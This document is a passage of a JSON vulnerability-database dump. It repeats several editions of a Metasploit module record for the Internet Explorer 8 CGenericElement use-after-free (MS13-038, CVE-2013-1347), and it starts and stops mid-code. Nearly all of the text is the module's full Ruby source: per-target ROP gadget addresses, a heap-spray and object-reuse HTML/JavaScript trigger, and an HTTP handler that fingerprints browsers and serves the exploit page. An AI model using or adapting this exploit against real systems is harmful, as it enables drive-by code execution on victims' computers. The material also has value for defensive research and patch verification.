document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-10T00:59:34", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-10T03:03:06", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 9.0, "modified": "2018-03-10T03:03:06"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-10T03:03:06", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-12T11:08:29", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 9.0, "modified": "2018-03-12T11:08:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-12T11:08:29", "differentElements": ["modified", "published"], "edition": 28}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-12T13:13:55", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 9.0, "modified": "2018-03-12T13:13:55"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-12T13:13:55", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-16T01:52:58", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 9.0, "modified": "2018-03-16T01:52:58"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when 